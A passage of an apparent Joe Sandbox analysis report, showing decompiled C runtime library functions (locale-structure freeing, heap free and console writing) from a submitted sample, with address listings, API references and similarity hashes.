                                                                                                                                                                                                                                                    							E010DA6DA(_t46);
                                                                                                                                                                                                                                                    							E010DBA92( *((intOrPtr*)(_t74 + 0x88)));
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t47 =  *((intOrPtr*)(_t74 + 0x80));
                                                                                                                                                                                                                                                    						if(_t47 != 0 &&  *_t47 == 0) {
                                                                                                                                                                                                                                                    							E010DA6DA(_t47);
                                                                                                                                                                                                                                                    							E010DBB90( *((intOrPtr*)(_t74 + 0x88)));
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						E010DA6DA( *((intOrPtr*)(_t74 + 0x7c)));
                                                                                                                                                                                                                                                    						E010DA6DA( *((intOrPtr*)(_t74 + 0x88)));
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				_t26 =  *((intOrPtr*)(_t74 + 0x8c));
                                                                                                                                                                                                                                                    				if(_t26 != 0 &&  *_t26 == 0) {
                                                                                                                                                                                                                                                    					E010DA6DA( *((intOrPtr*)(_t74 + 0x90)) - 0xfe);
                                                                                                                                                                                                                                                    					E010DA6DA( *((intOrPtr*)(_t74 + 0x94)) - 0x80);
                                                                                                                                                                                                                                                    					E010DA6DA( *((intOrPtr*)(_t74 + 0x98)) - 0x80);
                                                                                                                                                                                                                                                    					E010DA6DA( *((intOrPtr*)(_t74 + 0x8c)));
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				E010DAD9F( *((intOrPtr*)(_t74 + 0x9c)));
                                                                                                                                                                                                                                                    				_t28 = 6;
                                                                                                                                                                                                                                                    				_t55 = _t74 + 0xa0;
                                                                                                                                                                                                                                                    				_v8 = _t28;
                                                                                                                                                                                                                                                    				_t70 = _t74 + 0x28;
                                                                                                                                                                                                                                                    				do {
                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_t70 - 8)) != 0x116d7d0) {
                                                                                                                                                                                                                                                    						_t31 =  *_t70;
                                                                                                                                                                                                                                                    						if(_t31 != 0 &&  *_t31 == 0) {
                                                                                                                                                                                                                                                    							E010DA6DA(_t31);
                                                                                                                                                                                                                                                    							E010DA6DA( *_t55);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t28 = _v8;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					if( *((intOrPtr*)(_t70 - 0xc)) != 0) {
                                                                                                                                                                                                                                                    						_t29 =  *((intOrPtr*)(_t70 - 4));
                                                                                                                                                                                                                                                    						if(_t29 != 0 &&  *_t29 == 0) {
                                                                                                                                                                                                                                                    							E010DA6DA(_t29);
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    						_t28 = _v8;
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					_t55 = _t55 + 4;
                                                                                                                                                                                                                                                    					_t70 = _t70 + 0x10;
                                                                                                                                                                                                                                                    					_t28 = _t28 - 1;
                                                                                                                                                                                                                                                    					_v8 = _t28;
                                                                                                                                                                                                                                                    				} while (_t28 != 0);
                                                                                                                                                                                                                                                    				return E010DA6DA(_t74);
                                                                                                                                                                                                                                                    			}















                                                                                                                                                                                                                                                    0x010dac34
                                                                                                                                                                                                                                                    0x010dac38
                                                                                                                                                                                                                                                    0x010dac40
                                                                                                                                                                                                                                                    0x010dac49
                                                                                                                                                                                                                                                    0x010dac4e
                                                                                                                                                                                                                                                    0x010dac55
                                                                                                                                                                                                                                                    0x010dac5d
                                                                                                                                                                                                                                                    0x010dac65
                                                                                                                                                                                                                                                    0x010dac70
                                                                                                                                                                                                                                                    0x010dac76
                                                                                                                                                                                                                                                    0x010dac77
                                                                                                                                                                                                                                                    0x010dac7f
                                                                                                                                                                                                                                                    0x010dac87
                                                                                                                                                                                                                                                    0x010dac92
                                                                                                                                                                                                                                                    0x010dac98
                                                                                                                                                                                                                                                    0x010dac9c
                                                                                                                                                                                                                                                    0x010daca7
                                                                                                                                                                                                                                                    0x010dacad
                                                                                                                                                                                                                                                    0x010dac4e
                                                                                                                                                                                                                                                    0x010dacae
                                                                                                                                                                                                                                                    0x010dacb6
                                                                                                                                                                                                                                                    0x010dacc9
                                                                                                                                                                                                                                                    0x010dacdc
                                                                                                                                                                                                                                                    0x010dacea
                                                                                                                                                                                                                                                    0x010dacf5
                                                                                                                                                                                                                                                    0x010dacfa
                                                                                                                                                                                                                                                    0x010dad03
                                                                                                                                                                                                                                                    0x010dad0b
                                                                                                                                                                                                                                                    0x010dad0c
                                                                                                                                                                                                                                                    0x010dad12
                                                                                                                                                                                                                                                    0x010dad15
                                                                                                                                                                                                                                                    0x010dad18
                                                                                                                                                                                                                                                    0x010dad1f
                                                                                                                                                                                                                                                    0x010dad21
                                                                                                                                                                                                                                                    0x010dad25
                                                                                                                                                                                                                                                    0x010dad2d
                                                                                                                                                                                                                                                    0x010dad34
                                                                                                                                                                                                                                                    0x010dad3a
                                                                                                                                                                                                                                                    0x010dad3b
                                                                                                                                                                                                                                                    0x010dad3b
                                                                                                                                                                                                                                                    0x010dad42
                                                                                                                                                                                                                                                    0x010dad44
                                                                                                                                                                                                                                                    0x010dad49
                                                                                                                                                                                                                                                    0x010dad51
                                                                                                                                                                                                                                                    0x010dad56
                                                                                                                                                                                                                                                    0x010dad57
                                                                                                                                                                                                                                                    0x010dad57
                                                                                                                                                                                                                                                    0x010dad5a
                                                                                                                                                                                                                                                    0x010dad5d
                                                                                                                                                                                                                                                    0x010dad60
                                                                                                                                                                                                                                                    0x010dad63
                                                                                                                                                                                                                                                    0x010dad63
                                                                                                                                                                                                                                                    0x010dad75

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • ___free_lconv_mon.LIBCMT ref: 010DAC70
                                                                                                                                                                                                                                                      • Part of subcall function 010DBA92: _free.LIBCMT ref: 010DBAAF
                                                                                                                                                                                                                                                      • Part of subcall function 010DBA92: _free.LIBCMT ref: 010DBAC1
                                                                                                                                                                                                                                                      • Part of subcall function 010DBA92: _free.LIBCMT ref: 010DBAD3
                                                                                                                                                                                                                                                      • Part of subcall function 010DBA92: _free.LIBCMT ref: 010DBAE5
                                                                                                                                                                                                                                                      • Part of subcall function 010DBA92: _free.LIBCMT ref: 010DBAF7
                                                                                                                                                                                                                                                      • Part of subcall function 010DBA92: _free.LIBCMT ref: 010DBB09
                                                                                                                                                                                                                                                      • Part of subcall function 010DBA92: _free.LIBCMT ref: 010DBB1B
                                                                                                                                                                                                                                                      • Part of subcall function 010DBA92: _free.LIBCMT ref: 010DBB2D
                                                                                                                                                                                                                                                      • Part of subcall function 010DBA92: _free.LIBCMT ref: 010DBB3F
                                                                                                                                                                                                                                                      • Part of subcall function 010DBA92: _free.LIBCMT ref: 010DBB51
                                                                                                                                                                                                                                                      • Part of subcall function 010DBA92: _free.LIBCMT ref: 010DBB63
                                                                                                                                                                                                                                                      • Part of subcall function 010DBA92: _free.LIBCMT ref: 010DBB75
                                                                                                                                                                                                                                                      • Part of subcall function 010DBA92: _free.LIBCMT ref: 010DBB87
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010DAC65
                                                                                                                                                                                                                                                      • Part of subcall function 010DA6DA: HeapFree.KERNEL32(00000000,00000000,?,010DBC27,?,00000000,?,00000000,?,010DBC4E,?,00000007,?,?,010DADC4,?), ref: 010DA6F0
                                                                                                                                                                                                                                                      • Part of subcall function 010DA6DA: GetLastError.KERNEL32(?,?,010DBC27,?,00000000,?,00000000,?,010DBC4E,?,00000007,?,?,010DADC4,?,?), ref: 010DA702
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010DAC87
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010DAC9C
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010DACA7
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010DACC9
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010DACDC
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010DACEA
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010DACF5
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010DAD2D
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010DAD34
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010DAD51
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010DAD69
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 161543041-0
                                                                                                                                                                                                                                                    • Opcode ID: 80e1d9d63e2fb1c0b444ab5e5970d066c4ac4b3ba237c83e5f5a67c18e8a3758
                                                                                                                                                                                                                                                    • Instruction ID: 71b26d9bb23be3544f87b2844825684e7e13f39098d15c6559e581ff1ca50786
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 80e1d9d63e2fb1c0b444ab5e5970d066c4ac4b3ba237c83e5f5a67c18e8a3758
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E1316D3170430ADFEF61AA38D904B9A77E8FF642A1F105859E4C9D75A0DB31E8809B24
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                    			E010D9B3C(char _a4) {
                                                                                                                                                                                                                                                    				char _v8;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t26 = _a4;
                                                                                                                                                                                                                                                    				_t52 =  *_a4;
                                                                                                                                                                                                                                                    				if( *_a4 != 0x1127298) {
                                                                                                                                                                                                                                                    					E010DA6DA(_t52);
                                                                                                                                                                                                                                                    					_t26 = _a4;
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				E010DA6DA( *((intOrPtr*)(_t26 + 0x3c)));
                                                                                                                                                                                                                                                    				E010DA6DA( *((intOrPtr*)(_a4 + 0x30)));
                                                                                                                                                                                                                                                    				E010DA6DA( *((intOrPtr*)(_a4 + 0x34)));
                                                                                                                                                                                                                                                    				E010DA6DA( *((intOrPtr*)(_a4 + 0x38)));
                                                                                                                                                                                                                                                    				E010DA6DA( *((intOrPtr*)(_a4 + 0x28)));
                                                                                                                                                                                                                                                    				E010DA6DA( *((intOrPtr*)(_a4 + 0x2c)));
                                                                                                                                                                                                                                                    				E010DA6DA( *((intOrPtr*)(_a4 + 0x40)));
                                                                                                                                                                                                                                                    				E010DA6DA( *((intOrPtr*)(_a4 + 0x44)));
                                                                                                                                                                                                                                                    				E010DA6DA( *((intOrPtr*)(_a4 + 0x360)));
                                                                                                                                                                                                                                                    				_v8 =  &_a4;
                                                                                                                                                                                                                                                    				E010D9A02(5,  &_v8);
                                                                                                                                                                                                                                                    				_v8 =  &_a4;
                                                                                                                                                                                                                                                    				return E010D9A52(4,  &_v8);
                                                                                                                                                                                                                                                    			}




                                                                                                                                                                                                                                                    0x010d9b42
                                                                                                                                                                                                                                                    0x010d9b45
                                                                                                                                                                                                                                                    0x010d9b4d
                                                                                                                                                                                                                                                    0x010d9b50
                                                                                                                                                                                                                                                    0x010d9b55
                                                                                                                                                                                                                                                    0x010d9b58
                                                                                                                                                                                                                                                    0x010d9b5c
                                                                                                                                                                                                                                                    0x010d9b67
                                                                                                                                                                                                                                                    0x010d9b72
                                                                                                                                                                                                                                                    0x010d9b7d
                                                                                                                                                                                                                                                    0x010d9b88
                                                                                                                                                                                                                                                    0x010d9b93
                                                                                                                                                                                                                                                    0x010d9b9e
                                                                                                                                                                                                                                                    0x010d9ba9
                                                                                                                                                                                                                                                    0x010d9bb7
                                                                                                                                                                                                                                                    0x010d9bbf
                                                                                                                                                                                                                                                    0x010d9bc8
                                                                                                                                                                                                                                                    0x010d9bd0
                                                                                                                                                                                                                                                    0x010d9be4

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010D9B50
                                                                                                                                                                                                                                                      • Part of subcall function 010DA6DA: HeapFree.KERNEL32(00000000,00000000,?,010DBC27,?,00000000,?,00000000,?,010DBC4E,?,00000007,?,?,010DADC4,?), ref: 010DA6F0
                                                                                                                                                                                                                                                      • Part of subcall function 010DA6DA: GetLastError.KERNEL32(?,?,010DBC27,?,00000000,?,00000000,?,010DBC4E,?,00000007,?,?,010DADC4,?,?), ref: 010DA702
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010D9B5C
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010D9B67
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010D9B72
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010D9B7D
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010D9B88
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010D9B93
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010D9B9E
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010D9BA9
                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 010D9BB7
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                                                                                                                                    • Opcode ID: 05e44bee9a561c9f99cfcf7116767df9690f8da0b67bae7af9c5dfa498ef6973
                                                                                                                                                                                                                                                    • Instruction ID: 5e8a938e608843901612a11c85ded5788e62475b9f44d48fae5cb7fa518f858b
                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 05e44bee9a561c9f99cfcf7116767df9690f8da0b67bae7af9c5dfa498ef6973
                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0511837670420DFFCF41EF94C951CDD3BA5EF68290B5185A5FA488F221DA31EA51AB80
                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                    C-Code - Quality: 62%
                                                                                                                                                                                                                                                    			E010E3221(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, signed int _a8, signed char* _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                    				signed char _v15;
                                                                                                                                                                                                                                                    				char _v16;
                                                                                                                                                                                                                                                    				void _v24;
                                                                                                                                                                                                                                                    				short _v28;
                                                                                                                                                                                                                                                    				char _v31;
                                                                                                                                                                                                                                                    				void _v32;
                                                                                                                                                                                                                                                    				long _v36;
                                                                                                                                                                                                                                                    				intOrPtr _v40;
                                                                                                                                                                                                                                                    				void* _v44;
                                                                                                                                                                                                                                                    				signed int _v48;
                                                                                                                                                                                                                                                    				signed char* _v52;
                                                                                                                                                                                                                                                    				long _v56;
                                                                                                                                                                                                                                                    				int _v60;
                                                                                                                                                                                                                                                    				signed int _t78;
                                                                                                                                                                                                                                                    				signed int _t80;
                                                                                                                                                                                                                                                    				int _t86;
                                                                                                                                                                                                                                                    				void* _t94;
                                                                                                                                                                                                                                                    				long _t97;
                                                                                                                                                                                                                                                    				void _t105;
                                                                                                                                                                                                                                                    				void* _t112;
                                                                                                                                                                                                                                                    				signed int _t116;
                                                                                                                                                                                                                                                    				signed int _t118;
                                                                                                                                                                                                                                                    				signed char _t123;
                                                                                                                                                                                                                                                    				signed char _t128;
                                                                                                                                                                                                                                                    				intOrPtr _t129;
                                                                                                                                                                                                                                                    				signed int _t131;
                                                                                                                                                                                                                                                    				signed char* _t133;
                                                                                                                                                                                                                                                    				intOrPtr* _t135;
                                                                                                                                                                                                                                                    				signed int _t136;
                                                                                                                                                                                                                                                    				void* _t137;
                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                    				_t78 =  *0x116dd74; // 0x2e3e64ca
                                                                                                                                                                                                                                                    				_v8 = _t78 ^ _t136;
                                                                                                                                                                                                                                                    				_t80 = _a8;
                                                                                                                                                                                                                                                    				_t118 = _t80 >> 6;
                                                                                                                                                                                                                                                    				_t116 = (_t80 & 0x0000003f) * 0x30;
                                                                                                                                                                                                                                                    				_t133 = _a12;
                                                                                                                                                                                                                                                    				_v52 = _t133;
                                                                                                                                                                                                                                                    				_v48 = _t118;
                                                                                                                                                                                                                                                    				_v44 =  *((intOrPtr*)( *((intOrPtr*)(0x116e830 + _t118 * 4)) + _t116 + 0x18));
                                                                                                                                                                                                                                                    				_v40 = _a16 + _t133;
                                                                                                                                                                                                                                                    				_t86 = GetConsoleCP();
                                                                                                                                                                                                                                                    				_t135 = _a4;
                                                                                                                                                                                                                                                    				_v60 = _t86;
                                                                                                                                                                                                                                                    				 *_t135 = 0;
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t135 + 4)) = 0;
                                                                                                                                                                                                                                                    				 *((intOrPtr*)(_t135 + 8)) = 0;
                                                                                                                                                                                                                                                    				while(_t133 < _v40) {
                                                                                                                                                                                                                                                    					_v28 = 0;
                                                                                                                                                                                                                                                    					_v31 =  *_t133;
                                                                                                                                                                                                                                                    					_t129 =  *((intOrPtr*)(0x116e830 + _v48 * 4));
                                                                                                                                                                                                                                                    					_t123 =  *(_t129 + _t116 + 0x2d);
                                                                                                                                                                                                                                                    					if((_t123 & 0x00000004) == 0) {
                                                                                                                                                                                                                                                    						if(( *(E010D9839(_t116, _t129) + ( *_t133 & 0x000000ff) * 2) & 0x00008000) == 0) {
                                                                                                                                                                                                                                                    							_push(1);
                                                                                                                                                                                                                                                    							_push(_t133);
                                                                                                                                                                                                                                                    							goto L8;
                                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                                    							if(_t133 >= _v40) {
                                                                                                                                                                                                                                                    								_t131 = _v48;
                                                                                                                                                                                                                                                    								 *((char*)( *((intOrPtr*)(0x116e830 + _t131 * 4)) + _t116 + 0x2e)) =  *_t133;
                                                                                                                                                                                                                                                    								 *( *((intOrPtr*)(0x116e830 + _t131 * 4)) + _t116 + 0x2d) =  *( *((intOrPtr*)(0x116e830 + _t131 * 4)) + _t116 + 0x2d) | 0x00000004;
                                                                                                                                                                                                                                                    								 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                                    								_t112 = E010E27F0( &_v28, _t133, 2);
                                                                                                                                                                                                                                                    								_t137 = _t137 + 0xc;
                                                                                                                                                                                                                                                    								if(_t112 != 0xffffffff) {
                                                                                                                                                                                                                                                    									_t133 =  &(_t133[1]);
                                                                                                                                                                                                                                                    									goto L9;
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                    						_t128 = _t123 & 0x000000fb;
                                                                                                                                                                                                                                                    						_v16 =  *((intOrPtr*)(_t129 + _t116 + 0x2e));
                                                                                                                                                                                                                                                    						_push(2);
                                                                                                                                                                                                                                                    						_v15 = _t128;
                                                                                                                                                                                                                                                    						 *(_t129 + _t116 + 0x2d) = _t128;
                                                                                                                                                                                                                                                    						_push( &_v16);
                                                                                                                                                                                                                                                    						L8:
                                                                                                                                                                                                                                                    						_push( &_v28);
                                                                                                                                                                                                                                                    						_t94 = E010E27F0();
                                                                                                                                                                                                                                                    						_t137 = _t137 + 0xc;
                                                                                                                                                                                                                                                    						if(_t94 != 0xffffffff) {
                                                                                                                                                                                                                                                    							L9:
                                                                                                                                                                                                                                                    							_t133 =  &(_t133[1]);
                                                                                                                                                                                                                                                    							_t97 = WideCharToMultiByte(_v60, 0,  &_v28, 1,  &_v24, 5, 0, 0);
                                                                                                                                                                                                                                                    							_v56 = _t97;
                                                                                                                                                                                                                                                    							if(_t97 != 0) {
                                                                                                                                                                                                                                                    								if(WriteFile(_v44,  &_v24, _t97,  &_v36, 0) == 0) {
                                                                                                                                                                                                                                                    									L19:
                                                                                                                                                                                                                                                    									 *_t135 = GetLastError();
                                                                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                                                                    									 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 8)) - _v52 + _t133;
                                                                                                                                                                                                                                                    									if(_v36 >= _v56) {
                                                                                                                                                                                                                                                    										if(_v31 != 0xa) {
                                                                                                                                                                                                                                                    											goto L16;
                                                                                                                                                                                                                                                    										} else {
                                                                                                                                                                                                                                                    											_t105 = 0xd;
                                                                                                                                                                                                                                                    											_v32 = _t105;
                                                                                                                                                                                                                                                    											if(WriteFile(_v44,  &_v32, 1,  &_v36, 0) == 0) {
                                                                                                                                                                                                                                                    												goto L19;
                                                                                                                                                                                                                                                    											} else {
                                                                                                                                                                                                                                                    												if(_v36 >= 1) {
                                                                                                                                                                                                                                                    													 *((intOrPtr*)(_t135 + 8)) =  *((intOrPtr*)(_t135 + 8)) + 1;
                                                                                                                                                                                                                                                    													 *((intOrPtr*)(_t135 + 4)) =  *((intOrPtr*)(_t135 + 4)) + 1;
                                                                                                                                                                                                                                                    													goto L16;
                                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                                    											}
                                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                    					goto L20;
                                                                                                                                                                                                                                                    					L16:
                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                    				L20:
                                                                                                                                                                                                                                                    				return E010DDC5F(_v8 ^ _t136);
                                                                                                                                                                                                                                                    			}


































                                                                                                                                                                                                                                                    0x010e3229
                                                                                                                                                                                                                                                    0x010e3230
                                                                                                                                                                                                                                                    0x010e3233
                                                                                                                                                                                                                                                    0x010e323b
                                                                                                                                                                                                                                                    0x010e323f
                                                                                                                                                                                                                                                    0x010e324b
                                                                                                                                                                                                                                                    0x010e324e
                                                                                                                                                                                                                                                    0x010e3251
                                                                                                                                                                                                                                                    0x010e3258
                                                                                                                                                                                                                                                    0x010e3260
                                                                                                                                                                                                                                                    0x010e3263
                                                                                                                                                                                                                                                    0x010e3269
                                                                                                                                                                                                                                                    0x010e326f
                                                                                                                                                                                                                                                    0x010e3274
                                                                                                                                                                                                                                                    0x010e3276
                                                                                                                                                                                                                                                    0x010e3279
                                                                                                                                                                                                                                                    0x010e327e
                                                                                                                                                                                                                                                    0x010e3288
                                                                                                                                                                                                                                                    0x010e328f
                                                                                                                                                                                                                                                    0x010e3292
                                                                                                                                                                                                                                                    0x010e3299
                                                                                                                                                                                                                                                    0x010e32a0
                                                                                                                                                                                                                                                    0x010e32cc
                                                                                                                                                                                                                                                    0x010e32f2
                                                                                                                                                                                                                                                    0x010e32f4
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010e32ce
                                                                                                                                                                                                                                                    0x010e32d1
                                                                                                                                                                                                                                                    0x010e3398
                                                                                                                                                                                                                                                    0x010e33a4
                                                                                                                                                                                                                                                    0x010e33af
                                                                                                                                                                                                                                                    0x010e33b4
                                                                                                                                                                                                                                                    0x010e32d7
                                                                                                                                                                                                                                                    0x010e32de
                                                                                                                                                                                                                                                    0x010e32e3
                                                                                                                                                                                                                                                    0x010e32e9
                                                                                                                                                                                                                                                    0x010e32ef
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010e32ef
                                                                                                                                                                                                                                                    0x010e32e9
                                                                                                                                                                                                                                                    0x010e32d1
                                                                                                                                                                                                                                                    0x010e32a2
                                                                                                                                                                                                                                                    0x010e32a6
                                                                                                                                                                                                                                                    0x010e32a9
                                                                                                                                                                                                                                                    0x010e32af
                                                                                                                                                                                                                                                    0x010e32b1
                                                                                                                                                                                                                                                    0x010e32b4
                                                                                                                                                                                                                                                    0x010e32b8
                                                                                                                                                                                                                                                    0x010e32f5
                                                                                                                                                                                                                                                    0x010e32f8
                                                                                                                                                                                                                                                    0x010e32f9
                                                                                                                                                                                                                                                    0x010e32fe
                                                                                                                                                                                                                                                    0x010e3304
                                                                                                                                                                                                                                                    0x010e330a
                                                                                                                                                                                                                                                    0x010e3319
                                                                                                                                                                                                                                                    0x010e331f
                                                                                                                                                                                                                                                    0x010e3325
                                                                                                                                                                                                                                                    0x010e332a
                                                                                                                                                                                                                                                    0x010e3346
                                                                                                                                                                                                                                                    0x010e33b9
                                                                                                                                                                                                                                                    0x010e33bf
                                                                                                                                                                                                                                                    0x010e3348
                                                                                                                                                                                                                                                    0x010e3350
                                                                                                                                                                                                                                                    0x010e3359
                                                                                                                                                                                                                                                    0x010e335f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010e3361
                                                                                                                                                                                                                                                    0x010e3363
                                                                                                                                                                                                                                                    0x010e3366
                                                                                                                                                                                                                                                    0x010e337f
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010e3381
                                                                                                                                                                                                                                                    0x010e3385
                                                                                                                                                                                                                                                    0x010e3387
                                                                                                                                                                                                                                                    0x010e338a
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010e338a
                                                                                                                                                                                                                                                    0x010e3385
                                                                                                                                                                                                                                                    0x010e337f
                                                                                                                                                                                                                                                    0x010e335f
                                                                                                                                                                                                                                                    0x010e3359
                                                                                                                                                                                                                                                    0x010e3346
                                                                                                                                                                                                                                                    0x010e332a
                                                                                                                                                                                                                                                    0x010e3304
                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                    0x010e338d
                                                                                                                                                                                                                                                    0x010e338d
                                                                                                                                                                                                                                                    0x010e33c1
                                                                                                                                                                                                                                                    0x010e33d3

                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,010E3996,?,00000000,?,00000000,00000000), ref: 010E3263
                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 010E32DE
                                                                                                                                                                                                                                                    • __fassign.LIBCMT ref: 010E32F9
                                                                                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 010E331F
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000000,010E3996,00000000,?,?,?,?,?,?,?,?,?,010E3996,?), ref: 010E333E
                                                                                                                                                                                                                                                    • WriteFile.KERNEL32(?,?,00000001,010E3996,00000000,?,?,?,?,?,?,?,?,?,010E3996,?), ref: 010E3377
                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.864930148.00000000010D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 010D0000, based on PE: true
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.864836901.00000000010D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.865456747.00000000010E9000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866524306.000000000112C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.866966911.000000000116D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.867050163.000000000116F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_10d0000_CX17SY6xF6.jbxd
                                                                                                                                                                                                                                                    Similarity
